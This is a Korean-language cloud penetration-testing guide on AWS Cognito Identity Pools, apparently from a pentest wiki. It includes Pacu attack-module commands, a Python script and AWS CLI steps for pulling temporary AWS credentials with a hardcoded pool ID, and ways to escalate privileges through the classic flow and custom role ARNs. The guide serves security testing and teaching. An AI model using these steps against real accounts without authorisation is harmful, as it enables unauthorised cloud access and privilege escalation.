Cognito Identity Pools

Reading time: 7 minutes

Basic Information

Identity pools는 사용자가 임시 자격 증명을 획득할 수 있도록 하여 중요한 역할을 합니다. 이러한 자격 증명은 Amazon S3 및 DynamoDB를 포함한 다양한 AWS 서비스에 접근하는 데 필수적입니다. Identity pools의 주목할 만한 기능은 익명 게스트 사용자와 사용자 인증을 위한 다양한 신원 제공자를 지원한다는 점입니다. 지원되는 신원 제공자는 다음과 같습니다:

• Amazon Cognito user pools
• Facebook, Google, Login with Amazon, Sign in with Apple과 같은 소셜 로그인 옵션
• OpenID Connect (OIDC) 호환 제공자
• SAML (Security Assertion Markup Language) 신원 제공자
• 개발자 인증 신원

# Sample code to demonstrate how to integrate an identity provider with an identity pool can be structured as follows:
import boto3

# Initialize the Amazon Cognito Identity client
client = boto3.client('cognito-identity')

# Assume you have already created an identity pool and obtained the IdentityPoolId
identity_pool_id = 'your-identity-pool-id'

# Add an identity provider to the identity pool
response = client.set_identity_pool_roles(
IdentityPoolId=identity_pool_id,
Roles={
'authenticated': 'arn:aws:iam::AWS_ACCOUNT_ID:role/AuthenticatedRole',
'unauthenticated': 'arn:aws:iam::AWS_ACCOUNT_ID:role/UnauthenticatedRole',
}
)

# Print the response from AWS
print(response)

Cognito Sync

Identity Pool 세션을 생성하려면 먼저 Identity ID를 생성해야 합니다. 이 Identity ID는 해당 사용자의 세션 식별자입니다. 이러한 식별자는 최대 20개의 데이터 세트를 가질 수 있으며, 각 데이터 세트는 최대 1MB의 키-값 쌍을 저장할 수 있습니다.

이는 사용자의 정보를 유지하는 데 유용합니다 (항상 동일한 Identity ID를 사용하는 사용자).

또한, 서비스 cognito-sync는 이 정보를 관리하고 동기화하는 서비스를 제공합니다 (데이터 세트에서, 스트림 및 SNS 메시지로 정보를 전송하는 등).

Tools for pentesting

• Pacu, AWS 취약점 탐지 프레임워크로, 이제 "cognito__enum" 및 "cognito__attack" 모듈이 포함되어 있어 계정의 모든 Cognito 자산을 자동으로 열거하고 약한 구성, 접근 제어에 사용되는 사용자 속성 등을 플래그하며, 사용자 생성(여기에는 MFA 지원 포함) 및 수정 가능한 사용자 정의 속성, 사용 가능한 Identity Pool 자격 증명, ID 토큰에서 가정 가능한 역할 등을 기반으로 한 권한 상승을 자동화합니다.

모듈 기능에 대한 설명은 블로그 게시물 2부를 참조하십시오. 설치 지침은 주요 Pacu 페이지를 참조하십시오.

Usage

샘플 cognito__attack 사용법으로 주어진 Identity Pool 및 사용자 풀 클라이언트에 대해 사용자 생성 및 모든 권한 상승 벡터를 시도합니다:

Pacu (new:test) > run cognito__attack --username randomuser --email XX+sdfs2@gmail.com --identity_pools
us-east-2:a06XXXXX-c9XX-4aXX-9a33-9ceXXXXXXXXX --user_pool_clients
59f6tuhfXXXXXXXXXXXXXXXXXX@us-east-2_0aXXXXXXX

샘플 cognito__enum 사용법으로 현재 AWS 계정에서 볼 수 있는 모든 사용자 풀, 사용자 풀 클라이언트, 아이덴티티 풀, 사용자 등을 수집합니다:

Pacu (new:test) > run cognito__enum

• Cognito Scanner는 원치 않는 계정 생성 및 아이덴티티 풀 상승을 포함하여 Cognito에 대한 다양한 공격을 구현하는 파이썬 CLI 도구입니다.

Installation

$ pip install cognito-scanner

사용법

$ cognito-scanner --help

더 많은 정보는 https://github.com/padok-team/cognito-scanner 를 확인하세요.

IAM 역할 접근

인증되지 않음

공격자가 인증되지 않은 사용자로서 Cognito 앱에서 AWS 자격 증명을 얻기 위해 알아야 할 유일한 것은 Identity Pool ID이며, 이 ID는 웹/모바일 애플리케이션에 하드코딩되어 있어야 사용될 수 있습니다. ID는 다음과 같이 보입니다: eu-west-1:098e5341-8364-038d-16de-1865e435da3b (무작위 대입 공격이 불가능합니다).

하드코딩된 Identity Pools ID를 찾고 인증되지 않은 사용자를 허용하는 경우, 다음을 사용하여 AWS 자격 증명을 얻을 수 있습니다:

import requests

region = "us-east-1"
id_pool_id = 'eu-west-1:098e5341-8364-038d-16de-1865e435da3b'
url = f'https://cognito-identity.{region}.amazonaws.com/'
headers = {"X-Amz-Target": "AWSCognitoIdentityService.GetId", "Content-Type": "application/x-amz-json-1.1"}
params = {'IdentityPoolId': id_pool_id}

r = requests.post(url, json=params, headers=headers)
json_resp = r.json()

if not "IdentityId" in json_resp:
print(f"Not valid id: {id_pool_id}")
exit

IdentityId = r.json()["IdentityId"]

params = {'IdentityId': IdentityId}

headers["X-Amz-Target"] = "AWSCognitoIdentityService.GetCredentialsForIdentity"
r = requests.post(url, json=params, headers=headers)

print(r.json())

다음 aws cli 명령어를 사용할 수도 있습니다:

aws cognito-identity get-id --identity-pool-id <identity_pool_id> --no-sign
aws cognito-identity get-credentials-for-identity --identity-id <identity_id> --no-sign

Enhanced vs Basic Authentication flow

이전 섹션은 기본 향상된 인증 흐름을 따랐습니다. 이 흐름은 생성된 IAM 역할 세션에 제한적인 세션 정책을 설정합니다. 이 정책은 세션이 이 목록의 서비스만 사용할 수 있도록 허용합니다 (역할이 다른 서비스에 접근할 수 있었더라도).

그러나 Identity pool에 "Basic (Classic) Flow"가 활성화되어 있으면, 사용자는 해당 흐름을 사용하여 제한적인 세션 정책이 없는 세션을 얻을 수 있습니다.

# Get auth ID
aws cognito-identity get-id --identity-pool-id <identity_pool_id> --no-sign

# Get login token
aws cognito-identity get-open-id-token --identity-id <identity_id> --no-sign

# Use login token to get IAM session creds
## If you don't know the role_arn use the previous enhanced flow to get it
aws sts assume-role-with-web-identity --role-arn "arn:aws:iam::<acc_id>:role/<role_name>" --role-session-name sessionname --web-identity-token <token> --no-sign

An error occurred (InvalidParameterException) when calling the GetOpenIdToken operation: Basic (classic) flow is not enabled, please use enhanced flow.

IAM 자격 증명이 있는 경우 어떤 접근 권한이 있는지 확인하고 권한 상승을 시도하세요.

인증된 사용자

Identity Pool에 접근하는 인증된 사용자를 위한 역할도 있을 수 있습니다.

이를 위해 아이덴티티 제공자에 접근해야 할 수 있습니다. 만약 그것이 Cognito User Pool이라면, 기본 동작을 악용하여 직접 새로운 사용자를 생성할 수 있을지도 모릅니다.

어쨌든, 다음 예제는 Identity Pool에 접근하기 위해 사용되는 Cognito User Pool에 이미 로그인했다고 가정합니다 (다른 유형의 아이덴티티 제공자도 구성될 수 있다는 점을 잊지 마세요).

aws cognito-identity get-id \
--identity-pool-id  \
--logins cognito-idp..amazonaws.com/=

# 이전 명령 응답에서 identity_id를 가져옵니다
aws cognito-identity get-credentials-for-identity \
--identity-id  \
--logins cognito-idp..amazonaws.com/=


# IdToken에서 사용자가 User Pool 그룹으로 접근할 수 있는 역할을 찾을 수 있습니다
# --custom-role-arn을 사용하여 특정 역할에 대한 자격 증명을 가져옵니다
aws cognito-identity get-credentials-for-identity \
--identity-id  \
    --custom-role-arn  \
    --logins cognito-idp..amazonaws.com/=